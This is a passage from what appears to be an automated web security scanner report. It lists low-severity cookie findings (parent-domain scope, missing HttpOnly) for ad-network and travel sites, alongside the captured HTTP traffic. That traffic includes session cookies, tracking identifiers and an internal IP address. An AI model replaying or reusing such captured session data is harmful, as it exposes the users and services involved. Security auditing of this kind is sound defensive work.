Date: Mon, 03 Oct 2011 00:09:11 GMT
Expires: Mon Oct 03 00:09:11 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-1000424298|547040017; Domain=.tumri.net; Expires=Tue, 02-Oct-2012 00:09:11 GMT; Path=/
Set-Cookie: JSESSIONID=4BD4DF728C0984070FCE52BC4AA1C77B; Path=/ads
Content-Length: 1
Connection: keep-alive


13.175. http://www.wtp101.com/f  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /f

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /f?c=675&e=1 HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; synclock=t; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 03 Oct 2011 00:03:22 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:22 GMT; domain=.wtp101.com
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;
13.176. http://www.wtp101.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1762 HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/foreign-exchange-affiliates.htm?WT.mc_ID=DISP_Premiership_080711
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!2445!1731; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sun, 02 Oct 2011 23:58:07 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Tue, 01 Oct 2013 23:58:07 GMT; domain=.wtp101.com
Set-Cookie: s=!1762!2445!1731; path=/; expires=Tue, 01 Oct 2013 23:58:07 GMT; domain=.wtp101.com
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;
13.177. http://www.wtp101.com/pull_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /pull_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pull_sync?pid=openx HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=6511&cb=INSERT_RANDOM_NUMBER_HERE&loc=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!2445!1731; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Sun, 02 Oct 2011 23:54:23 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://r.openx.net/set?pid=25afcb2d-854d-efb2-7940-1323bbd101a7&rtb=f9bdca69-e609-4297-9145-48ea56a0756c
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Tue, 01 Oct 2013 23:54:23 GMT; domain=.wtp101.com
Content-Length: 0
Connection: keep-alive

13.178. http://www.wtp101.com/push_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wtp101.com
Path:   /push_sync

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /push_sync HTTP/1.1
Host: www.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://o-va3.wtp101.com/imp?bc=CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscXh9X2XSOH7kO_fDwCKqa4H0Cvxg-Sdg
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; synclock=t; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 03 Oct 2011 00:03:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Pragma: no-cache
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:03:21 GMT; domain=.wtp101.com
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;
13.179. http://www9.effectivemeasure.net/v4/em_js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www9.effectivemeasure.net
Path:   /v4/em_js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /v4/em_js?flag=0&v=&vt=&hl=&sv=0&pv=&pn=&p=aHR0cDovL3d3dy5nb2FsLmNvbS9lbi90ZWFtcy9lbmdsYW5kLzk3L21hbi11dGQtbmV3cw%3D%3D&r=&f=1&ns=_em&rnd=0.11160158668644726&u=&sf=1& HTTP/1.1
Host: www9.effectivemeasure.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.goal.com/en/teams/england/97/man-utd-news
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hl=1; vt=ad466b7502917b9a0779b9e202024e62e18088e413-981323754e62e3b1

Response

HTTP/1.1 200 OK
P3P: policyref="http://www.effectivemeasure.net/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Pragma: no-cache
Cache-Control: no-cache
Cache-Control: no-cache, must-revalidate
Pragma-directive: no-cache
Cache-Directive: no-cache
Expires: 0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: hl=1; expires=Tue, 01-Nov-2011 23:52:45 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: vt=92ca95cf72da02be93a9b9e202024e62e18088e413-981323754e88f94d; expires=Wed, 26-Sep-2012 23:52:45 GMT; path=/; domain=.effectivemeasure.net
Set-Cookie: v=452d73c7cba4bbda22aaf13bd6fa4e88f8d57af834-210214684e88f94d338_5280; expires=Mon, 03-Oct-2011 00:22:45 GMT; path=/; domain=.effectivemeasure.net
Content-type: text/javascript
Connection: close
Content-Length: 186
Date: Sun, 02 Oct 2011 23:52:45 GMT
Server: C20

_em._domain="goal.com";_em.setCkHl();_em.setCkVt("92ca95cf72da02be93a9b9e202024e62e18088e413-981323754e88f94d");_em.setCkV("452d73c7cba4bbda22aaf13bd6fa4e88f8d57af834-210214684e88f94d");
14. Cookie without HttpOnly flag set  previous  next
There are 296 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

14.1. http://ads.adxpose.com/ads/ads.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=eaa3bCBGoZRHY9Na_666924 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=495FD43AF8795ECDFF0FF0915EA3CEDB; Path=/
ETag: "20773-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 01:53:16 GMT
Connection: close

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...
14.2. http://afe.specificclick.net/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://afe.specificclick.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?l=24038&sz=728x90&wr=j&t=j&u=http%3A%2F%2Fdm.travelocity.com%2Fhtml.ng%2Fadsize%3D728x90%26site%3Dtravelocity%26cobrand%3DTRAVELOCITY%26locale%3Den%26area%3Dhotel%26dest%3DBOS%26paxa%3D0%26paxs%3D0%26paxc%3D0%26adloc%3DNA%26random%3D771852%26tile%3D128609801075344%26section%3Dresults&r=http%3A%2F%2Ftravel.travelocity.com%2Fhotel%2FHotelAvailability.do%3Bjsessionid%3D74C1C04EA1B1607D7CD2E1313B9B2779.p0617&rnd=876971 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADVIVA=NOTRACK

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=7223935ceaae2e8049f67e6c582a; Path=/
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 03 Oct 2011 00:15:01 GMT
Content-Length: 2104

document.write('<div style="z-index:10; position:relative; width:728px">'+'<scr'+'ipt language="JavaScript" type="text/javascript" src="http://view.atdmt.com/DWC/jview/352348532/direct/01?click=http:/
...[SNIP]...
14.3. http://aon.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://aon.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: aon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20gpv_pageName%3D/site/search.jsp%7C1317605245122%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C81DF03B10ABEDA473F7CB693F3AAC01; Path=/
Content-Type: text/html;charset=utf-8
Date: Mon, 03 Oct 2011 01:11:36 GMT
Content-Length: 72723

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>

   <SCRIPT LANGUAGE="JavaScript">
       URL = window.location
...[SNIP]...
14.4. http://as00.estara.com/fs/rules.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://as00.estara.com
Path:   /fs/rules.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fs/rules.php?accountid=200106297609&title=Priceline.com%20-%20hotel%2C%20hotel%20reservation%2C%20cheap%20hotel%2C%20las%20vegas%20hotel%2C%20boston%20hotel%2C%20hotel%20deal%2C%20ne&referrer=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchHotels.do%3Fsession_key%3D711510AC721510AC2011100300374475eeb1270807%26plf%3Dpclh%26INIT_SESSION%3Dtrue%26refid%3DPLAWAYNETWORK%26refclickid%3DTRIP_HOTELSEARCH%26searchType%3DCITY%26cityName%3Dbos%26numberOfRooms%3D1%26hotelBrand%3D%26searchHotelName%3D%26starRating%3D-1%26checkInDate%3D10%252F09%252F2011%26checkOutDate%3D10%252F16%252F2011%26KMode%3DY%26selectedTab%3D0%26passingValues%3DYES%26affiliateSubID%3D514A&w=1920&h=1200&d=16&platform=Win32&ua=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F535.1%20(KHTML%2C%20like%20Gecko)%20Chrome%2F14.0.835.187%20Safari%2F535.1&cs=ISO-8859-1&estara_fsguid=5860EEFA281121EC93852AEC182A3278&estara_firsttime=1317600765&location=http%3A%2F%2Ftravela.priceline.com%2Fhotel%2FsearchResults.do%3Fjsk%3D4663010a5564010a20111003003755e18011569968%26key%3Dgtaqdik9%26showDP%3Dy%26NYOPRedirNI%3Dnull&dnc=131760243799780739 HTTP/1.1
Host: as00.estara.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://travela.priceline.com/hotel/searchResults.do?jsk=4663010a5564010a20111003003755e18011569968&key=gtaqdik9&showDP=y&NYOPRedirNI=null
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fs_nocache_guid=5860EEFA281121EC93852AEC182A3278; fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEPHGXI50sSRMAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh94eXFpcUtLkwIL.4VGou6YSkomBP5AWZ9O32tT3Pbf39c33sa41o.-u67Ssm5A4OMZH7un3crhWmzNkiq.iRVbhIYB2RVfRI4OBJMCIBxb7jECOHfQ57N-FEjLBCok4OMUj2JBvpg4oB8j6A8oZYOjqPcac2AJWTIJJNMUdcUkRqhXRRD8AlEvZCuhhEPBFP1BP1hDyhQTKoGKmik9KikVOFkdKKQXbRSAIJ5naITsqVHpVWMQh6gkZIchoFNeUYjHtUNsqflNSCD9WDiwrqg0s2Tc7knWN6dY6Tc5yc1TuXForvp1gHEDGMkTZlNmE6IkxHhKmw4AsTjODqqGrkMYjL25VnOjF1N6J8tFX0Dw__

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:40:41 GMT
Server: Apache
P3P: CP="NON DSP COR CUR OUR LEG PHY COM", policyref="http://as00.estara.com/w3c/p3p.xml"
Cache-Control: private, max-age=2592000
Set-Cookie: fsserver__SESSION__=s-5201.estara.com; path=/fs; domain=.estara.com
Set-Cookie: fsserver__SESSION____SECURE__=s-5201.estara.com; path=/fs; domain=.estara.com; secure
Set-Cookie: fscookies=b64_XZPLcsMgDEX-xrtm9OSxyLd0nDYz6SJpp3H-vxiDEPHGXI50sSRMAAiBclbSMzKqUk5JlvWyXZ8bOfr.uz4.H3-3c5ATZsgh94eXFpcUtLkwIL.4VGou6YSkomBP5AWZ9O32tT3Pbf39c33sa41o.-u67Ssm5A4OMZH7un3crhWmzNkiq.iRVbhIYB2RVfRI4OBJMCIBxb7jECOHfQ57N-FEjLBCok4OMUj2JBvpg4oB8j6A8iYRfBnjTm0AKidBJJtijrikiNQKoSbqAbREwl5IF4OIJ.KJeqKekCc0SAYVI1V0Ulo0cqowUloxyC4aSSDB3A7RSbnSo9IqBkFP0AhJTqOgphyDcY-KRvmTklrwoXpwUUF9cMmmyZm8c0yvznFyjpOzeufSQvH9FOsAIoYx0qbMJkxHhOmIMBUWfGGCEVwdVY08BnF5u-JMJ6buRpSP7hXhPw__; expires=Sat, 01-Oct-2016 00:40:41 GMT; path=/; domain=.estara.com
Expires: Wed, 02 Nov 2011 00:40:41 GMT
Content-Length: 26085
Content-Type: text/javascript; charset=UTF-8

eStara_obscuration['87123']='bookCreditCardNumber';eStara_obscuration['72139']='offer(.*)CREDIT_CARD_NUM|offer(.*)credit_card|offer(.*)CREDIT_CARD_NUM(.*)';eStara_obscuration['72149']='offer(.*)EXPIRA
...[SNIP]...
14.5. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drf.gif?t=p&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&lang=en&cc=US HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=24183C4AD860308D1AAD3C586C84EC19.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:49 GMT
Server: Apache
Set-Cookie: JSESSIONID=29F46A6CB42B71BC5130159228D86761.p0521; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.55
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Expires: -1
Via: 1.1 (Service Gateway)
Content-Length: 50
Connection: close
Content-Type: image/gif

GIF89a.............!..DRF.!...
...,...........L..;
14.6. http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://drf-global.com
Path:   /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/drfcomms/advertisers?mid=2&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a& HTTP/1.1
Host: drf-global.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=97DB591617D2DBD9035C58A353B0EF86.p0522

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:50 GMT
Server: Apache
Set-Cookie: JSESSIONID=BD863729C172E3809E90E563D50004A1.p0520; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.54
Cache-Control: must-revalidate
